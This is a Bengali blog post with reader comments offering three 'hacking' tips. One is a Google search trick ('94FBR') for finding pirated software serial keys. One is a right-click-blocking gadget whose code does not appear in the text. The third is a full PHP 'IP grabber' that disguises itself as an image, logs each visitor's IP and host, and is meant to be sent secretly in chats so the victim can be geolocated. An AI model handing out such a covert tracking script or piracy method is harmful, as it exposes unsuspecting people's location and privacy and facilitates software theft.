হ্যাকিং সবারই ভাল লাগে । এটি করতে সবাই রোমাঞ্চ এবং আনন্দ অনুভব করে । কিন্তু এতদুর যাবার জন্য ও কিন্তু আপনাকে আনুসঙ্গিক নিরাপত্তা ও কিছু ছোট খাটো টিপস জানতে হবে । এরকম তিনটি টিপস তাই আপনাদের জন্য নিয়ে এলাম ।
Finding Serial Key Of Any Software Using Simple Google Trick
আপনি হয়তবা কষ্ট করে কোন সফটওয়্যার নামালেন । এরপর আপনি তা ইন্সটল দিলেন । দেয়ার পর আপনার তো মাথা গরম কাজ ই হয়না । তখন শুধু বুদ্ধি আর গুগল কে কাজে লাগিয়ে আপনি এর সমাধান পাবেন ।
94FBR হল এমন একটা কি Office 2000 Pro CD activation key এর একটা অংশ এবং নানাভাবে এটি ছড়িয়ে গেছে । আপনি যদি আপনার কাঙ্খিত সফটওয়্যার এর সাথে এই কি ওয়ার্ড কাজে লাগান তাহলে আপনি সিরিয়াল কি পাবেনই পাবেন
1. গুগল এ যান
2. এরপর টাইপ করুন Software Name 94FBR
- Software Name এর জায়গায় আপনি যে সফটওয়্যার এর কি খুজতে চান
- Eg: নিরোর জন্য Nero 94fbr
3. এখন এন্টার চাপুন ।
How To Disable Right Click On Your Website Or Blog ?
আপনি আপনার ব্লগ এ কষ্ট করে ব্লগ পোস্ট করে বের হলেন । এরপর ফেসবুক এ লগিন করেই দেখলেন আপনার সেই লেখা কেউ নিজের নামে চালিয়ে দিচ্ছে তখন আপনার মাথা গরম না হয়ে পারেনা । তাই আমি আপনাকে এই জাভাস্ক্রিপ্ট ট্রিক দিচ্ছি ।
1. ব্লগার Dashboard এ যান এরপর ক্লিক করুন Layout.
2. এবার Add Gadgetএ ক্লিক করুন এবং Html/Javascript. সিলেক্ট করুন
আপনি শেষ লাইন এ আপনার নিজের ব্লগ সাইট এর নাম দেবেন ।
এবার সেভ করে দিন । তাহলে কাজ হয়ে যাবে ।
How to grab someone IP address ?
আমি আপনাদের দেখাব .php ফাইল দিয়ে কিভাবে কারো আইপি হাতিয়ে নেয়া যায় । এর থেকে আর সহজ উপায় এ cmd দিয়ে এ কাজ করা যায় । কিন্তু এটি পরিক্ষিত । আর সব থেকে মজার ব্যাপার হচ্ছে আপনি ফেসবুক বা জি মেইল এ চ্যাট ইং এর সময় এই পদ্ধতি কাজে লাগাতে পারেন
1. নিচের কোড গুলো Notepad এ কপি করে Grab.php নামে সেভ করুন (.php is must)
<?php
$hostname = gethostbyaddr($_SERVER[‘REMOTE_ADDR’]);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);
imagefill($img_number,0,0,$backcolor);
$number0 = ” This is Your IP/Proxy”;
$number1 = ” IP: $_SERVER[HTTP_X_FORWARDED_FOR]”;
$number2 = ” Host/Proxy: $hostname”;
$number4 = ” _________________________________”;
Imagestring($img_number,10,5,5,$number0,$textcolor);
Imagestring($img_number,10,5,25,$number1,$textcolor);
Imagestring($img_number,10,5,45,$number2,$textcolor);
Imagestring($img_number,10,5,50,$number4,$textcolor);
Imagestring($img_number,10,8,50,$number4,$textcolor);
Imagestring($img_number,10,5,10,$number4,$textcolor);
Imagestring($img_number,10,8,10,$number4,$textcolor);
header(“Content-type: image/png”);
imagepng($img_number);
$file=fopen(“Name-here-to-protect-the-File.txt”,”a”);
$file2 = “- IP joined – IP/Proxy: $_SERVER[HTTP_X_FORWARDED_FOR] – Host: $hostname – ‘\n’ “;
fwrite($file, $file2);
fclose($file);
?>
এখন যে কোন ফ্রী হোস্টিং সাইট এ এগুলো আপলোড করুন যেমন http://www.110mb.com বা http://www.hotfile.com
এরপর আপনাকে যে লিঙ্ক দেয়া হবে তা আপনি ফেসবুক বা যে কোন যায়গায় দিন । এখন কেউ এই লিঙ্ক এ ক্লিক করলে তার আইপি আপনার ফ্রী হোস্টিং সাইট এ লগ আকারে পেয়ে যাবেন
এরপর http://www.ip2location.com এ ধরনের সাইট এ আইপি দিয়ে পিং করলে তার সব তথ্য আপনি পেয়ে যাবেন ।
আচ্ছা আজ এইটুকুই । আবার পরে কথা হবে …
এরকম অনেক কিছু পাবেন > http://www.facebook.com/CY133R এ
আর আমাকে পাবেন > http://www.facebook.com/techfreak.unknown এ
আল্লাহ হাফেয
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~10%3∞ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
আরেকটা দারুন টিউন
মান সম্মত, কার্যকরী, এবং সুন্দর লিখনি মিলিয়ে অপূর্ব
দারুন hoeche
দুর্দান্ত, অনেক ধন্যবাদ, সুন্দর টিপসগুলো জন্য.
চমরকার টিপস। ধন্যবাদ।
ভেরি নাইস ব্রো। দারুন হয় আপনার প্রতি লিখাই খুব সুন্দর। চালিয়ে যান। ধন্যবাদ